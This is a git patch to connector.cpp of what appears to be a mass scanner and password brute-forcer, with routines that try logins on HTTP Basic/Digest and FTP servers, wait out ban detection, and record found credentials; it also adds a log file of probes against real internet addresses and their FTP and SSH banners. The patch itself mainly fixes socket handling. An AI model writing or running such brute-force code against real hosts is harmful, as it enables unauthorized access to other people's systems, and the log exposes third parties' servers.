From 458113bc6cbfd4e7f108d62d13d7bae2d0ca0030 Mon Sep 17 00:00:00 2001 From: cora32 Date: Tue, 25 Nov 2014 07:51:55 +0300 Subject: [PATCH] =?UTF-8?q?=D0=A4=D0=B8=D0=BA=D1=81=20=D1=83=D1=82=D0=B5?= =?UTF-8?q?=D1=87=D0=B5=D0=BA?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- connector.cpp | 61 ++++---------- debugData.txt | 227 ++++++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 245 insertions(+), 43 deletions(-) create mode 100644 debugData.txt diff --git a/connector.cpp b/connector.cpp index 7e7dd03..7f76e75 100644 --- a/connector.cpp +++ b/connector.cpp @@ -363,6 +363,7 @@ char *_makeDigestResponse( CvtHex(response, responseMD5); return (char*)responseMD5; }; + lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) { if(strcmp(method, "[DIGEST]") != 0 && strcmp(method, "[NORMAL]") != 0) stt->doEmitionRedFoundData("[-] Unknown method IP: " + QString(ip) + ":" + QString::number(port) + + ""); @@ -403,10 +404,7 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) if(port == 443) { ZeroMemory(headerMsg, REQUEST_MAX_SIZE); -// while(baSSLLocked) Sleep(200); -// baSSLLocked = true; _baSSLWorker(ip, hRqst, headerMsg); -// baSSLLocked = false; } #pragma endregion else @@ -434,7 +432,7 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) return lps; }; #endif - SOCKET sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); + sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); send(sock, hRqst, strlen(hRqst), 0); @@ -444,7 +442,7 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) int xx = 0; while(xx < 512) { - x = recvWT(sock, hMsgR, sizeof(hMsgR), gTimeOut + 10, &bTO); + x = recvWT(sock, hMsgR, sizeof(hMsgR), gTimeOut + 5, &bTO); if(x <= 0) break; strncat(headerMsg, hMsgR, x); xx += x; @@ -453,6 +451,9 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(headerMsg)); }; #pragma endregion + + CSSOCKET(sock); + if(strlen(headerMsg) == 0) { isActive = 0; @@ -469,8 +470,6 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) { if(strstri(headerMsg, "400 Bad") != NULL) { - CSSOCKET(sock); - strcpy(lps.other, "[400 Bad Request]"); isActive = 0; return lps; @@ -489,9 +488,7 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) goon = true; } else - { - CSSOCKET(sock); - + { strcpy(lps.other, QString("[404 Not Found (" + QString(path) + ")]").toLocal8Bit().data()); isActive = 0; return lps; @@ -514,16 +511,12 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) if(goon == false) { - CSSOCKET(sock); - strcpy(lps.login, "NULL"); strcpy(lps.pass, "NULL"); isActive = 0; return lps; }; }; - - CSSOCKET(sock); #pragma endregion isActive = 1; @@ -653,15 +646,13 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) { sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); - cErrCode = WSAGetLastError(); - while(cErrCode == 10038) + while(WSAGetLastError() == 10038) { if(gDebugMode) stt->doEmitionDebugFoundData("[BA] 10038 occured -- [" + QString(ip) + ":" + QString::number(port) + "]"); CSSOCKET(sock); sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); - cErrCode = WSAGetLastError(); }; if(cCode != SOCKET_ERROR) { @@ -709,7 +700,6 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) strcpy(lps.login, "UNKNOWN"); return lps; }; - CSSOCKET(sock); }; #pragma endregion @@ -845,6 +835,7 @@ lopaStr Connector::_BALobby(char *cookie, char *ip, int port, char *path, char * return res; }; + lopaStr _FTPBrute(char *ip, int port, PathStr *ps) { lopaStr lps; @@ -896,15 +887,13 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps) closedSocket = 0; sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); - int cErrCode = WSAGetLastError(); - while(cErrCode == 10038) + while(WSAGetLastError() == 10038) { - if(gDebugMode) stt->doEmitionDebugFoundData("[FTP] 10038 occured -- [" + QString(ip) + ":" + QString::number(port) + "]"); + if(gDebugMode) stt->doEmitionDebugFoundData("[FTP] 10038 occured - [" + QString(ip) + ":" + QString::number(port) + "]"); CSSOCKET(sockFTP); sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); - cErrCode = WSAGetLastError(); }; loginFailedFlag = 0; }; @@ -925,8 +914,7 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps) Activity += x; closedSocket = 0; - if(strstr(recvBuff, "451 The parameter is incorrect") != NULL - ) + if(strstr(recvBuff, "451 The parameter is incorrect") != NULL) { CSSOCKET(sockFTP); isActive = 0; @@ -979,26 +967,17 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps) ) { j = 0; - CSSOCKET(sockFTP); - closedSocket = 1; - ZeroMemory(recvBuff, sizeof(recvBuff)); break; }; if(strstr(recvBuff, "421 ") != NULL || strstr(recvBuff, "421-") != NULL) { - CSSOCKET(sockFTP); - closedSocket = 1; - ZeroMemory(recvBuff, sizeof(recvBuff)); break; }; if(strstri(recvBuff, "530 Sorry, no ANONYMOUS access allowed.") != NULL) { ++i; - CSSOCKET(sockFTP); - closedSocket = 1; - ZeroMemory(recvBuff, sizeof(recvBuff)); break; }; @@ -1009,10 +988,7 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps) || strstr(recvBuff, "from this IP") != NULL || strstr(recvBuff, "from your IP") != NULL) { -#pragma region QTGUI_Area stt->doEmition_BARedData("[-] FTP: 530 - Ban detected? Waiting 30sec (" + QString(ip) + ")"); -#pragma endregion - CSSOCKET(sockFTP); closedSocket = 1; if(j > 0) --j; ZeroMemory(recvBuff, sizeof(recvBuff)); @@ -1026,7 +1002,6 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps) else { loginFailedFlag = 1; - ZeroMemory(recvBuff, sizeof(recvBuff)); break; }; strcat(request, "\r\n"); @@ -1048,7 +1023,6 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps) ) { loginFailedFlag = 1; - ZeroMemory(recvBuff, sizeof(recvBuff)); break; } else if(strstr(recvBuff, "331") != NULL) @@ -1072,7 +1046,6 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps) else { loginFailedFlag = 1; - ZeroMemory(recvBuff, sizeof(recvBuff)); break; }; strcat(request, "\r\n"); @@ -1282,6 +1255,7 @@ lopaStr Connector::_FTPLobby(char *ip, int port, PathStr *ps) return lps; }; + int _sslConnectTo(char *iph, int porth, char *requesth, conSTR *CSTR) { SSL *ssl = NULL; @@ -1510,15 +1484,16 @@ int Connector::_EstablishConnection(char *ip, int port, char *request, conSTR *C FD_SET(sock, &read_fs); timeval tv = { gTimeOut, 0 }; - iResult = select(sock + 1, NULL, &read_fs, NULL, &tv); + int oldErr = WSAGetLastError(); + iResult = select(sock + 1, &read_fs, NULL, NULL, &tv); if (iResult == SOCKET_ERROR) { ++offlines; - stt->doEmitionRedFoundData("[Omitting IP] Select error - " + - QString::number(WSAGetLastError()) + - " - " + QString(ip) + ":" + QString::number(port)); + stt->doEmitionRedFoundData("[Omitting IP] Select error-" + + QString::number(WSAGetLastError()) + " oldErr:" + QString::number(oldErr) + + " sock:" + QString::number(sock) + " -" + QString(ip) + ":" + QString::number(port)); } else { diff --git a/debugData.txt b/debugData.txt new file mode 100644 index 0000000..e190a25 --- /dev/null +++ b/debugData.txt @@ -0,0 +1,227 @@ +========================== +SSH-2.0-dropbear_0.48 + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.6:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220-MegaBit Gear TE4121C FTP server ready +220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) +530 USER and PASS required +530 USER and PASS required + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.25:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 (vsFTPd 1.2.0) +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. +530 Please login with USER and PASS. + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.44:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220-MegaBit Gear TE4121C FTP server ready +220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) +530 USER and PASS required +530 USER and PASS required + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.65:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220-MegaBit Gear TE4121C FTP server ready +220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) +530 USER and PASS required +530 USER and PASS required + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.124.200:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220-MegaBit Gear TE4121C FTP server ready +220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003) +530 USER and PASS required +530 USER and PASS required + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.144.207:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 Simple FTPd welcomes you. + + + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.147.250:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 FTP server ready. +500 'GET' command not understood. + +========================== +========================== + +========================== +SSH-2.0-dropbear + +========================== +========================== + +========================== +SSH-2.0-dropbear + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.175.116:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 FTP server ready. +500 'GET' command not understood. + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.175.94:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 Simple FTPd welcomes you. + + + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.2.189.106:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 Simple FTPd welcomes you. + + + +========================== +========================== + +========================== +SSH-2.0-OpenSSH_6.6p1-hpn14v4 + +========================== +========================== + +GET / HTTP/1.1 +Host: 222.3.13.167:21 +Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 +Accept-Language: us-US,ru;q=0.9,en;q=0.8 +Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 +Accept-Encoding: text, identity, *;q=0 +User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11 +Connection: close + +========================== +220 ibs-soho FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready. +500 'GET / HTTP/1.1': command not understood. +500 'HOST: 222.3.13.167:21': command not understood. +500 'ACCEPT: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1': command not understood. +500 'ACCEPT-LANGUAGE: us-US,ru;q=0.9,en;q=0.8': command not understood. +500 'ACCEPT-CHARSET: iso-8859-1, utf-8, utf-16, *;q=0.1': command not understood. +500 'ACCEPT-ENCODING: text, identity, *;q=0': command not understood. +500 'USER-AGENT: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11': command not understood. +500 'CONNECTION: close': command not understood. +500 '': command not understood. + +========================== +========================== +